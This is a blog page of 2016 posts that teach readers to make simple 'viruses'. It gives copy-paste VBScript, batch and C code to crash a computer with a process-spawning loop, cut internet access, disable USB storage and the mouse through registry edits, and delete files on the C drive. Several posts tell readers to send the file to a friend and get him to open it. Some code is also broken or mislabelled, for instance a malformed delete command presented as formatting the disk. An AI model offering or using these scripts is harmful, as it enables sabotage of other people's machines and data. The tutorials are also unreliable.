Showing posts with label making a virus. Show all posts
Showing posts with label making a virus. Show all posts

Thursday, 28 April 2016

Virus That Crashes the Computer

Virus That Crashes the Computer

Hello, Friends Today we are Going to make a "Virus that Crashes the Computer"


So Friends, Today we creating a Virus That Crashes the Computer. So please don't try to run this Virus On your own Computer. This Virus is very dangerous for Computer. This can Harm your Computer very badly. I will not be Responsible for any Damage done to your Computer. Do all the Practical on your Own risk.


In this Post, We are going to develop a "Virus" which Crashes the Computer. To Develop this Virus i am going to use Visual Basic Script. 

After opening the Virus Computer get Crash. There is no other way to protect your Computer.

[Note] This Post is only for Educational Purpose.

Steps to Create Virus


1. Go to Start Menu.
2. Open Notepad.
3. Just copy & Paste the Code Given Below.
_______________CODE_______________

Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
____________________________________
4. Save this file with ".vbs" Extension.
5. Your Virus is Completed. It is ready to Run.

_________________________Thank You_________________________

Virus That Stops Internet Access

Virus That Stops Internet Access 

Hello, Friend i am back With some Hacking Tutorial. 
Today. We are going to make a "Virus" Which Stops Internet Access. 
This Virus Is very Danger so don't try to Run this virus on your own computer. Otherwise you will not be able to Access the Internet. I will Not be Responsible for any damage done to your Computer. Do all Practical at your Own Risk.


In this post, I am going to Tech you How to make a Simple "virus". To make this virus i am Going to use "Batch language".


Once Virus Executed. It Denied the access to the Internet.

Steps to Create Virus


1. Go to Start menu.
2. Open Notepad.
3. Just Copy & paste the Code given below.

_________________CODE_________________

@echo off
Ipconfig /release
_______________________________________

4. Save the File with ".bat" Extension.

Steps to Disable Virus


1. Go to Start menu.
2. Open Command Prompt.
3. Type the Code Given below & Press Enter.

_________________CODE_________________

IPconfig /renew 
_______________________________________

4. You can See that You get the Access to Internet.

____________________________Thank You____________________________

Virus That Disable USB Port

Virus That Disable USB Port

Today, We are going to Create a "Virus that Disable your USB Port"



Please Don't try to Run this Virus on Your Own Computer. This will Disable your USB Port. I will not be Responsible For any Damage done to your Computer.

In This Post, I am Going to Show you How to create a simple "Virus". To Create This Virus We are going to use "C Language". Anyone with Basic Knowledge of C is able to Understand the working of this virus Program.

Once the Virus successfully Executed. It will Disable (Block) all the USB Port. As a Result you will not be able to use any USB device on Your Machine.



Prerequisite


1. A Computer.
2. Compiler.
3. Notepad.

Steps to Create Virus


1. Go to Start Menu.
2. Open Notepad.
3. Just Copy & Past the Code given below.

__________________CODE To Disable Port__________________

#include<stdio.h>

void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}
_______________________________________________________

4. First Compile this code after Compile you will get Same name file in same Place with ".exe" Extension.
5. Execute that ".exe" file your Virus will run & disable all USB Port.


1. Go to Start Menu.
2. Open Notepad.
3. Just Copy & Past the Code given below.

__________________CODE to Unblock Port__________________

#include<stdio.h>

void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}
________________________________________________________

4. First Compile this code after Compile you will get Same name file in same Place with ".exe" Extension.
5. Execute that ".exe" file your Anti-Virus will run & Unblock all USB Port.


________________________________Thank You________________________________


Wednesday, 27 April 2016

Make a Virus That Disable your Mouse

Make a Virus That Disable your Mouse

Today, We are going to create a Virus that Disable your Mouse.






Prerequisite

1. A Computer.

Steps to Create Virus


1. Go to Start Menu.
2. Open Notepad.
3. Just Copy and Paste the Code 

___________Code___________
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem --------------------------------

4. Save the File with ".bat" Extension.
5. Send this File to your Friend & Tell him to Open The file. His Mouse will not work after Opening the File.



Virus to Format the Disk

Virus to Format the Disk

Today, We are Going to Create a Virus that Format the C Drive.



Prerequisite 

1. A Computer.

Steps to Create Virus

1. Go to Start Menu.
2. Open notepad.
3. Just Copy and Paste the Below Code.
_______________Code_____________

@Echo off
Del C:\ *.* |y
________________________________

4. Save this File with ".bat" Extension.
5. Send this File to your Friend and tell him to open this File.

_______________________________Thank you_______________________________